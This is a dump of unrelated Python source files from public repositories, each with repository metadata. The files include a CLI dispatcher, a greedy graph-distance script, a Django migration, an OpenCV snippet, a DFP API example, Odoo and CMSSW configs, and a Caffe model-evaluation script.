Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
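# Sketch of the commands.json shape this constructor expects (the field names come from
# the lookups above; the command, module and class values are illustrative, not from the repo):
#
#     [
#       {
#         "Conditions": ["network", "status"],
#         "Module Identifier": "network_status",
#         "Class Identifier": "NetworkStatus"
#       }
#     ]
#
# _is_command is True only when every docopt option named in "Conditions" is truthy,
# so the first matching entry decides which command class is imported and run.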
authors: ["johnyob132@gmail.com"] | author_id: johnyob132@gmail.com
blob_id: 8c933fd456834988004265d8cb6e1a7801ec7b35 | directory_id: b013eb7ffc0c41e874c04a55065de96a9313ab17 | content_id: f3d3b164a7b8e8b0244d280f07fd701a95f4287a
path: /longest_path1.py | repo_name: YuiGao/shortest_longest_path | detected_licenses: [] | license_type: no_license
snapshot_id: 69fcf5724cfb03e7a94f33b507fa25e7c41f69ed | revision_id: 111d85c2fa090b497cc2896ddf644a21ffc4e69f | branch_name: refs/heads/master
visit_date: 2020-05-07T19:29:09.282219 | revision_date: 2019-04-11T14:54:47 | committer_date: 2019-04-11T14:54:47 | github_id: 180,815,191 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,509 | extension: py
nodes = ('A', 'B', 'C', 'D', 'E', 'F', 'G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z')
distances = {
'A':{'B':5,'C':6,'D':4,'E':7},
'B':{'A':5,'F':2,'G':3},
'C':{'A':6,'F':6,'G':4,'H':1},
'D':{'A':4,'G':7,'H':3,'I':6},
'E':{'A':7,'H':9,'I':1},
'F':{'B':2,'C':6,'J':2,'K':3},
'G':{'B':3,'C':4,'D':7,'J':6,'K':4,'L':1},
'H':{'C':1,'D':3,'E':9,'K':7,'L':3,'M':6},
'I':{'D':6,'E':1,'L':9,'M':7},
'J':{'F':2,'G':6,'N':2,'O':3},
'K': {'F': 3, 'G': 4, 'H': 7, 'N': 6, 'O': 4, 'P': 1},
'L': {'G': 1, 'H': 3, 'I': 9, 'O': 7, 'P': 10, 'Q': 6},
'M': {'H': 6, 'I': 7, 'P': 9, 'Q': 8},
'N': {'J': 2, 'K': 6, 'R': 2, 'S': 3},
'O': {'J': 3, 'K': 4, 'L': 7, 'R': 6, 'S': 4, 'T': 1},
'P': {'K': 1, 'L': 10, 'M': 9, 'S': 7, 'T': 3, 'U': 6},
'Q': {'L': 6, 'M': 8, 'T': 9, 'U': 1},
'R': {'N': 2, 'O': 6, 'V': 2, 'W': 3},
'S': {'N': 3, 'O': 4, 'P': 7, 'V': 6, 'W': 4, 'X': 1},
'T': {'O': 1, 'P': 3, 'Q': 9, 'W': 7, 'X': 3, 'Y': 6},
'U': {'P': 6, 'Q': 1, 'X': 9, 'Y': 1},
'V': {'R': 2, 'S': 6, 'Z': 5},
'W': {'R': 3, 'S': 4, 'T': 7, 'Z': 6},
'X': {'S': 1, 'T': 3, 'U': 9, 'Z': 4},
'Y': {'T': 6, 'U': 1, 'Z': 7},
'Z': {'V': 5, 'W': 6, 'X': 4, 'Y': 7}
}
unvisited = {node: None for node in nodes}  # None stands in for "no distance recorded yet" (infinity)
visited = {}  # records the nodes that have already been relaxed
current = 'A'  # find the distances from node A to every other node
currentDistance = 0
unvisited[current] = currentDistance  # the distance from A to itself is 0
while True:
for neighbour, distance in distances[current].items():
if neighbour not in unvisited: continue  # already relaxed, skip this neighbour
newDistance = currentDistance + distance  # candidate distance via the current node
if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:  # no distance recorded yet, or the new distance is greater (longest-path variant)
unvisited[neighbour] = newDistance  # update the recorded distance
visited[current] = currentDistance  # the current node has been relaxed, record it
del unvisited[current]  # remove it from the unvisited dict
if not unvisited: break  # stop once every node has been relaxed
candidates = [node for node in unvisited.items() if node[1]]  # unvisited nodes that already have a tentative distance
current, currentDistance = sorted(candidates, key = lambda x: x[1])[0]  # pick the next node to relax from
if(current == "Z"):
print('Longest path length from Start to End:', currentDistance)
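# Extension sketch (not in the original script): to recover the route itself, record a
# predecessor whenever a node's distance is improved inside the relaxation loop, e.g.
#
#     predecessor = {}
#     ...
#     if unvisited[neighbour] is None or unvisited[neighbour] < newDistance:
#         unvisited[neighbour] = newDistance
#         predecessor[neighbour] = current
#
# and then walk predecessor backwards from 'Z' to 'A' to print the path that produced
# the reported length.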
authors: ["1205319351@qq.com"] | author_id: 1205319351@qq.com
blob_id: 7f7434016d940893c9cb3b72ea218d424554329e | directory_id: ea416617fdf6632081cb91fccfb2e8fa5965ad9e | content_id: f4cf7c2b4ef825c3680cda2b86819c90200f91f0
path: /plan/migrations/0002_route.py | repo_name: fergalpowell/final_year_project | detected_licenses: [] | license_type: no_license
snapshot_id: 249f8289ab84b5daba98a9f262e1a2637760cd49 | revision_id: 568e8cb646ccf5b6a25c1368ffd2204d7d5f08ab | branch_name: refs/heads/master
visit_date: 2021-09-13T17:29:26.868935 | revision_date: 2018-05-02T15:03:14 | committer_date: 2018-05-02T15:03:14 | github_id: 112,532,473 | stars: 1 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 698 | extension: py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-04-17 11:22
from __future__ import unicode_literals
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('plan', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Route',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('route', django.contrib.gis.db.models.fields.LineStringField(srid=4326)),
('name', models.CharField(max_length=250)),
],
),
]
authors: ["fergal.powell@gmail.com"] | author_id: fergal.powell@gmail.com
blob_id: 4327917009b231fd6cbcb15c547b3403e777d4b3 | directory_id: 856762ba0c6c69f4b086689764fad0d019a50146 | content_id: 9d7ada5b5d96e3196d6bf53313ed2f2350199158
path: /图片颜色分割.py | repo_name: JonathanScoot/Events | detected_licenses: [] | license_type: no_license
snapshot_id: bc9ec0194a972fe677693a1a8bff7539ff474bbf | revision_id: 795442eb56345b876847ce3c32ea4ea0631ddfb9 | branch_name: refs/heads/master
visit_date: 2020-04-30T13:37:13.664734 | revision_date: 2019-03-21T03:33:32 | committer_date: 2019-03-21T03:33:32 | github_id: 176,863,623 | stars: 1 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 234 | extension: py
import cv2
import numpy as np
cap = cv2.imread('/Users/wangjie/Desktop/road1.jpg', 0)
while True:
displayimage = cv2.imshow('road', cap)
k=cv2.waitKey(5) &0xFF
if k==27:
break
cv2.destroyAllWindows()
# cv2.line requires an image, two end points, a colour and a thickness, for example:
# cv2.line(cap, (0, 0), (100, 100), 255, 2)
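# Sketch of the colour segmentation the filename refers to (assumptions: the image is
# re-read in colour, and the HSV range below is an arbitrary blue band, purely illustrative):
#
#     img = cv2.imread('/Users/wangjie/Desktop/road1.jpg')            # BGR, 3 channels
#     hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
#     mask = cv2.inRange(hsv, np.array([100, 50, 50]), np.array([130, 255, 255]))
#     segmented = cv2.bitwise_and(img, img, mask=mask)
#     cv2.imshow('segmented', segmented)
#     cv2.waitKey(0)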
authors: ["Jonathan@MacBook-Pro-2.lan"] | author_id: Jonathan@MacBook-Pro-2.lan
blob_id: aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9 | directory_id: 7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a | content_id: 9086f2f5d7006a77c1a7b578138725bf4db3479b
path: /examples/adspygoogle/dfp/v201101/get_licas_by_statement.py | repo_name: hockeyprincess/google-api-dfp-python | detected_licenses: ["Apache-2.0"] | license_type: permissive
snapshot_id: 534519695ffd26341204eedda7a8b50648f12ea9 | revision_id: efa82a8d85cbdc90f030db9d168790c55bd8b12a | branch_name: refs/heads/master
visit_date: 2021-01-10T10:01:09.445419 | revision_date: 2011-04-14T18:25:38 | committer_date: 2011-04-14T18:25:38 | github_id: 52,676,942 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,266 | extension: py
#!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = 'api.sgrinberg@gmail.com (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
authors: ["api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"] | author_id: api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
blob_id: 431bab8eea3abbc7fae959c140647f6a74cb2440 | directory_id: a266cfe89cf9c7347abf712e3b800468438448c2 | content_id: 1449bd63251da49b08f0d9e19d5075ac17b82eaf
path: /extra_addons/formio_data_api/__manifest__.py | repo_name: cialuo/project_template | detected_licenses: [] | license_type: no_license
snapshot_id: db8b9f9c4115a6d44363a39e311363e8f3e7807f | revision_id: 2f875bdc5b730afeae3dd8dffafde852d0a44936 | branch_name: refs/heads/main
visit_date: 2023-03-09T17:50:55.398557 | revision_date: 2021-02-24T00:17:59 | committer_date: 2021-02-24T00:17:59 | github_id: null | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 669 | extension: py
# Copyright Nova Code (http://www.novacode.nl)
# See LICENSE file for full licensing details.
{
'name': 'Forms | Data API',
'summary': 'Python API for Forms data (builder, form/submission).',
'version': '0.5',
'license': 'LGPL-3',
'author': 'Nova Code',
'website': 'https://www.novacode.nl',
'live_test_url': 'https://demo13.novacode.nl',
'category': 'Extra Tools',
'depends': ['formio'],
'data': [],
'external_dependencies': {
'python': ['formio-data'],
},
'application': False,
'images': [
'static/description/banner.gif',
],
'description': """
Forms | Data API
================
"""
}
authors: ["dungth@trobz.com"] | author_id: dungth@trobz.com
blob_id: 7efbf28a97b17e623a9be0e1d817befa061257fc | directory_id: fe061550aa4a6d894aba6fc91ec3f4a9c276ee5d | content_id: 25c61242fc5df1a2a7699333ce47b47e4d7cdd91
path: /ALCARAW_RECO/python/pdfSystematics_cff.py | repo_name: ldcorpe/ECALELF | detected_licenses: [] | license_type: no_license
snapshot_id: 0f11c04c63cd4ef9c0fac9168d827c8b4d99eada | revision_id: 6f8196c6c455b9ff092007ea5d0e69fc6e68a517 | branch_name: refs/heads/master
visit_date: 2020-12-30T22:08:58.160533 | revision_date: 2014-03-05T09:35:07 | committer_date: 2014-03-05T09:35:07 | github_id: 17,245,358 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: 2015-07-23T17:14:56 | gha_created_at: 2014-02-27T10:42:42 | gha_language: C++
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 727 | extension: py
import FWCore.ParameterSet.Config as cms
# Produce PDF weights (maximum is 3)
pdfWeights = cms.EDProducer("PdfWeightProducer",
# Fix POWHEG if buggy (this PDF set will also appear on output,
# so only two more PDF sets can be added in PdfSetNames if not "")
#FixPOWHEG = cms.untracked.string("cteq66.LHgrid"),
#GenTag = cms.untracked.InputTag("genParticles"),
PdfInfoTag = cms.untracked.InputTag("generator"),
PdfSetNames = cms.untracked.vstring(
"cteq66.LHgrid"
, "MRST2006nnlo.LHgrid"
, "NNPDF10_100.LHgrid"
)
)
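# Usage sketch (assumption: this fragment is imported into a standard cms.Process
# configuration; the path label below is illustrative):
#
#     process.pdfWeights = pdfWeights
#     process.pdfPath = cms.Path(process.pdfWeights)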
authors: ["shervin@cern.ch"] | author_id: shervin@cern.ch
blob_id: 7a01f23b1d83f8f97510a946715871ec8f1d5700 | directory_id: 6d63fb09abb41f2c3f6ba66091b8c0507044104d | content_id: 3d41ef1913f6c48a13f1ebb8c86ac5ac6a627c48
path: /py/liu.py | repo_name: buaaswf/backup-my-projects | detected_licenses: [] | license_type: no_license
snapshot_id: dbc3d0c4ac5af38b4b8ce07be7978e3ff36cf75c | revision_id: 73577385da85fdd5899cb471220dd8334ca603bc | branch_name: refs/heads/master
visit_date: 2021-04-15T03:44:06.248881 | revision_date: 2018-03-22T08:58:36 | committer_date: 2018-03-22T08:58:36 | github_id: 126,304,153 | stars: 0 | forks: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 16,242 | extension: py
#!/usr/bin/env python
# encoding: utf-8
import numpy as np
import sys
from sklearn.metrics import classification_report
sys.path.insert(0,"/home/s.li/2017/gpu4/caffe-segnet-cudnn5/python")
import matplotlib.pyplot as plt
import caffe
import os
import scipy.io
import shutil
from mnist_single_plot_roc import drawroc
# Make sure that caffe is on the python path:
from sklearn.metrics import confusion_matrix
from tsne.tsne_1 import tsnepng
def vis_square(resname, data, padsize=1, padval=0):
data -= data.min()
data /= data.max()
# force the number of filters to be square
n = int(np.ceil(np.sqrt(data.shape[0])))
padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3)
data = np.pad(data, padding, mode='constant', constant_values=(padval, padval))
# tile the filters into an image
data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1)))
data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:])
plt.imsave(resname, data)
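# Usage sketch (assumption: `net` is a loaded caffe.Net such as the one returned by
# loadmodel below; 'conv1' is the usual first convolution layer of the AlexNet deploy net):
#
#     filters = net.params['conv1'][0].data               # shape (num_filters, 3, k, k)
#     vis_square('conv1_filters.png', filters.transpose(0, 2, 3, 1))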
def GetFileList(dir, fileList):
newDir = dir
if os.path.isfile(dir):
fileList.append(dir.decode('gbk'))
elif os.path.isdir(dir):
for s in os.listdir(dir):
# to skip certain folders, use the code below
if s.endswith(".txt") or s.endswith(".sh") or s.endswith(".py"):
continue
#if int(s)>998 and int(s) < 1000:
newDir=os.path.join(dir,s)
GetFileList(newDir, fileList)
return fileList
#dir = '/home/s.li/caffe0719/caffe-master/data/face/patch/casia1000/fullpathval.txt'
def labelfile(dir):
lines = []
with open (dir,'r') as f:
lines = [line.strip().split(' ') for line in f ]
#paths = [line[0] for line in lines]
#labels = [line[1] for line in lines]
# print lines
return lines
if len(sys.argv) != 4:
print "Usage: python multifc.py inputimagedir feature.mat labeldir"
# sys.exit()
def loadmodel(caffepath='../',modelpath='models/casiaface/casia.caffemodel',deployroot='models/casiaface/casia_train_deploy.prototxt',meanroot='data/idface/casia_web.npy',shapelist=[64,3,100,100]):
# caffe_root = caffepath # this file is expected to be in {caffe_root}/examples
caffe_root = "/home/s.li/2017/gpu4/caffe-segnet-cudnn5/"# this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
plt.rcParams['figure.figsize'] = (10, 10)
plt.rcParams['image.interpolation'] = 'nearest'
params = {'legend.fontsize':20}
plt.rcParams.update(params)
# plt.rcParams['image.cmap'] = 'gray'
model =modelpath
if not os.path.isfile(model):
print("Downloading pre-trained CaffeNet model...")
caffe.set_mode_cpu()
net = caffe.Net(deployroot,model,caffe.TEST)
# input preprocessing: 'data' is the name of the input blob == net.inputs[0]
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2, 0, 1))
# transformer.set_mean('data', np.load(caffe_root + meanroot).mean(1).mean(1)) # mean pixel
blob = caffe.proto.caffe_pb2.BlobProto()
data = open( meanroot , 'rb' ).read()
blob.ParseFromString(data)
arr = np.array( caffe.io.blobproto_to_array(blob) )
out = arr[0]
transformer.set_mean('data', out.mean(1).mean(1)) # mean pixel
transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2, 1, 0)) # the reference model has channels in BGR order instead of RGB
# set net to batch size of 50
net.blobs['data'].reshape(shapelist[0], shapelist[1], shapelist[2], shapelist[3])
return net,transformer
def image2mat(net,transformer,inputimagedir,outdir,labelfilepath,layername):
#inputimagedir = sys.argv[1]
mat = []
# lines = labelfile(labelfilepath)
# print lines
labels = []
pred = []
predroc= []
nn = 0
caffe.set_mode_gpu()
allimages= GetFileList(inputimagedir, [])
testimages =allimages
# from random import shuffle
import random
# print allimages
random.shuffle(testimages)
errorimagelist="./error/mnist_result/"+outdir.split(".")[0]
if not os.path.exists(errorimagelist):
os.makedirs(errorimagelist)
# print testimages
for image in testimages:
# print image,
gtlabel = int(image.split("/")[-2])
# print gtlabel
try:
net.blobs['data'].data[...] = transformer.preprocess('data', caffe.io.load_image(image))
except Exception, e:
print nn
print str(e)
nn += 1
continue
out = net.forward()
# pred.append(str(out['prob'].argmax()))
# print (out['prob'].shape)
# pred.append(out['prob'][1])
# print("image is {}Predicted class is #{}.".format(image,out['prob'].argmax()))
if out['prob'].argmax()!=gtlabel:
print out['prob'].argmax(),gtlabel
shutil.copy(image,errorimagelist+"/"+image.split("/")[-1].split(".")[0]+"_pred_"+str(out['prob'].argmax())+".png")
# caffe.set_mode_gpu()
# caffe.set_device(0)
#net.forward() # call once for allocation
# %timeit net.forward()
# feat = net.blobs[layername].data[1]
feat = net.blobs[net.blobs.keys()[-2]].data[0]
# for layer_name, param in net.params.iteritems():
# print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape)
# print net.blobs.keys()
# filters = net.params['conv1'][0].data
# print filters
predroc.append(net.blobs[net.blobs.keys()[-1]].data[0].flatten())
pred.append(np.argmax(net.blobs[net.blobs.keys()[-1]].data[0].flatten()))
# print "===>>",net.blobs[net.blobs.keys()[-1]].data[0].flatten()
# pred.append(out['prob'])
# print out['prob']
# print net.blobs[net.blobs.keys()[-2]].data[0]
#np.savetxt(image+'feature.txt', feat.flat)
#print type(feat.flat)
featline = feat.flatten()
# print featline
#print type(featline)
#featlinet= zip(*(featline))
mat.append(featline)
label=image.split("/")[-2]
# labels.append(str(lines[nn][1]))
labels.append(int(label))
# print "===>>",out['prob'].argmax()
# print "=====>>",lines[nn][1]
if (nn%100==0):
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
nn += 1
# print pred.shape
# tsnepng(mat,labels,"gootsne_"+outdir)
print "tsnepng=========================>>>>"
drawroc(labels,predroc,"./error/mnist_result/"+"zoomroc_10"+outdir.split('.')[0]+".png")
print "roc=========================>>>>"
print (classification_report(labels,pred))
text_file = open("./error/mnist_result/"+outdir.split('.')[0]+".txt", "w")
text_file.write(outdir.split('.')[0]+" model\n")
text_file.write(classification_report(labels,pred))
import pickle
with open("./error/mnist_result/"+outdir.split('.')[0]+"_pred.pkl","wb") as f:
pickle.dump(mat,f)
with open("./error/mnist_result/"+outdir.split('.')[0]+"_true.pkl","wb") as f:
pickle.dump(labels,f)
with open("./error/mnist_result/"+outdir,'w') as f:
scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append
cm=confusion_matrix(pred, labels)
with open("./error/mnist_result/"+outdir.split(".")[0]+".pkl","wb") as f:
pickle.dump(cm,f)
print cm
np.savetxt("./error/mnist_result/"+outdir.split(".")[0]+"mfse"+".csv", cm, delimiter=",")
def batch_extrac_featuretomat():
#alexnet
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
# alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/"
alexnetpath="/home/s.li/2016/caffe1128/caffe-master/models/"
# googlenetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_googlenet/"
# cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar_cifar10/"
# svhn_cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/svhn/cifar10net/"
# svhn_googlenetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/googlenet/"
# svhn_alexnetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/alexnet/"
# googlenetpath+"bvlc_googlenet_iter_520000.caffemodel",\
# googlenetpath+"oribvlc_googlenet_iter_520000.caffemodel",\
# modelist=[alexnetpath+"oriciafr10caffe_alexnet_train_iter_390000.caffemodel",\
# alexnetpath+"dvnciafr10caffe_alexnet_train_iter_450000.caffemodel",\
# modelist=[alexnetpath + "cifar10gen_caffe_alexnet_train_iter_130000.caffemodel",\
# modelist =[alexnetpath + "cifar10balanced0_caffe_alexnet_train_iter_410000.caffemodel",\
# modelist =[alexnetpath + "7caffe_alexnet_train_iter_30000.caffemodel",\
# modelist =[alexnetpath + "0509dvn/caffe_alexnet_train_iter_120000.caffemodel",\
# modelist =[alexnetpath + "10caffe_alexnet_train_iter_10000.caffemodel",\
modelist =[alexnetpath + "mnist/mnist_data/result1/caffe_alexnet_train_iter_140000.caffemodel",\
alexnetpath + "mnist/mnist_data/result2/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result3/caffe_alexnet_train_iter_120000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result4/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result5/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result6/caffe_alexnet_train_iter_120000.caffemodel",\
alexnetpath + "mnist/mnist_data/result7/caffe_alexnet_train_iter_50000.caffemodel",\
#alexnetpath + "mnist/mnist_data/result8/caffe_alexnet_train_iter_60000.caffemodel",\
alexnetpath + "mnist/mnist_data/result9/caffe_alexnet_train_iter_110000.caffemodel",\
alexnetpath + "mnist/mnist_data/result10/caffe_alexnet_train_iter_50000.caffemodel",\
alexnetpath + "mnist/mnist_data/result11/caffe_alexnet_train_iter_50000.caffemodel",\
]
datalist=["/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
#"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
"/home/s.li/2017/gpu4/analysisfeatures/mnist_test/",
]
deploylist=[alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
#alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
alexnetpath+"bvlc_alexnet/deploy.prototxt",
]
# meanlist=[alexnetpath+"patchcifa10_256_mean.binaryproto",
meanlist=[alexnetpath+"mnist/mnist_data/mean/mean1.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean2.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean3.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean4.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean5.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean6.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean7.binaryproto",
#alexnetpath+"mnist/mnist_data/mean/mean8.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean9.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean10.binaryproto",
alexnetpath+"mnist/mnist_data/mean/mean11.binaryproto",
]
shapelists=[[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227],\
[10,3,227,227],[10,3,227,227]]#
# [32,3,224,224],[32,3,224,224],\
# [64,3,32,32],[64,3,32,32],[64,3,32,32],[64,3,32,32],
# [10,3,227,227],[10,3,227,227],[10,3,224,224],[10,3,224,224]]
labellist=["cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",
"cifa10_valdst.csv",]
#"cifa10_valdst.csv",]
# "svhn_ori_valdst.csv",]
# labellist=[""]
# outlist=["cifar10_alex_oversmaple.mat","cifar10_alex_ori.mat","cifar10_cifar10_dvn.mat",
# "cifar10_cifar10_ori.mat","cifar10_google_dvn.mat","cifar10_google_ori.mat",
# "svhn_cifar10_dvn.mat","svhn_cifar10_ori.mat","svhn_alex_dvn.mat","svhn_alex_ori.mat",
# "svhn_google_dvn.mat","svhn_google_ori.mat"
# ]
outlist=["alex_mfseoverh1.mat","alex_mfseoverh2.mat",
"alex_mfseoverh5.mat","alex_mfseoverh6.mat",
"alex_mfseoverh7.mat","alex_mfseoverh9.mat",
"alex_mfseoverh10.mat","alex_mfseoverh11.mat",]
#]
layernamelist=["fc8","fc8","fc8","fc8","fc8","fc8","fc8","fc8"]
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
# layernamelist=["fc8","fc8","loss3/classifier","loss3/classifier","ip1","ip1",
# "ip1","ip1","fc8","fc8","loss3/classifier","loss3/classifier"]
import traceback
# for i in range(len(modelist)-1,len(modelist)):
for i in range(0,len(modelist)):
# for i in range(0,1):
# if i<4 and i>1:
# continue
# for i in range(2,4):
try:
print modelist[i]
net,transformer=loadmodel(modelpath=modelist[i],deployroot=deploylist[i],
meanroot=meanlist[i],shapelist=shapelists[i])
image2mat(net,transformer,datalist[i],outlist[i],labellist[i],layernamelist[i])
except Exception as e:
print e
print traceback.format_exc()
# break
continue
#argv[0] inputimagedir argv[1] labelfile
if __name__=='__main__':
# if len(sys.argv)!=3:
# print "Usage:python{}inputimagedir outdir labelfile".format(sys.argv[0])
    batch_extract_feature_to_mat()
#net,transformer=loadmodel(sys.argv[0],sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])
# net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/cifa10/cifar10_deploy.prototxt",meanroot="data/cifar10-gcn-leveldb-splits/paddedmean.npy",shapelist=[100,3,32,32])
# # net,transformer=loadmodel(modelpath='models/cifa10/cifar10_19layers_iter_200000.caffemodel',deployroot="models/scene/deploy.prototxt",shapelist=[50,3,100,100])
# image2mat(net,transformer,sys.argv[1],sys.argv[2],sys.argv[3])#argv[0] inputimagedir argv[1] labelfile
#def loadmodel(cafferoot,modelpath,deployroot,meanroot,shapelist=[64,3,100,100]):
|
[
"noreply@github.com"
] |
buaaswf.noreply@github.com
|
e27d03897ae226bf6eafffa5093cee07b628880d
|
a1dd6f2e13506b54120532c2ed093dc270eff4ac
|
/GridServices/TransactiveControl/TNT_Version1/TNSAgent/tns/transactive_record.py
|
3f466148e9947fe21eff8fd0e8fe6acc846f3d6b
|
[
"BSD-3-Clause"
] |
permissive
|
shwethanidd/volttron-pnnl-applications-2
|
ec8cc01c1ffeff884c091617892fea6e84a3e46e
|
24d50729aef8d91036cc13b0f5c03be76f3237ed
|
refs/heads/main
| 2023-06-18T12:13:13.607951
| 2021-06-30T23:00:01
| 2021-06-30T23:00:01
| 359,586,385
| 0
| 0
|
BSD-3-Clause
| 2021-04-19T20:15:45
